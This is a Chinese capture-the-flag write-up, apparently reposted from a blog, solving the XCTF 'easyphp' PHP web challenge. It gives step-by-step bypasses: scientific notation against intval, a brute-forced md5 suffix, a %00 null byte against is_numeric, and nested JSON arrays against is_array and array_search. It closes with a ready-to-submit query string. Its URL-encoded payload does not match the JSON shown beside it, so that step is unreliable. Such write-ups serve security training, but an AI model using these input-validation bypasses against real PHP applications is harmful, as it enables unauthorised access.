第一步，用科學計數(shù)法繞過 a=1e9

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)#$a=1e9

第二步，用php代碼編寫md5碰撞腳本得到b=53724

<?php for ($i = 1; $i < 100000; $i++) {if('8b184b' === substr(md5($i),-6,6)){echo($i);} } ?>

第三步，繞過is_numeric函數(shù)

$c=(array)json_decode(@$_GET['c']); #接收json格式的字符串并將其轉化為數(shù)組c={"m":"2033%00"}#使用%00可以繞過is_numeric函數(shù)

第四步，繞過is_array函數(shù)

c={"m":"2033%00","n":[[1]]}

?第五步，繞過array_search函數(shù)

c={"m":"2033%00","n":[[0,2],0]}#對{"m":"2033%00","n":[[0,2],0]}進行url編碼得到： %7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

一定要對傳值url編碼

?a=1e9&b=53724&c=%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

提交得到flag

??

參考文章

攻防世界ctf web easyphp題解wp_中原第一高手的博客-CSDN博客?

總結

以上是生活随笔為你收集整理的攻防世界easyphp解题wp的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。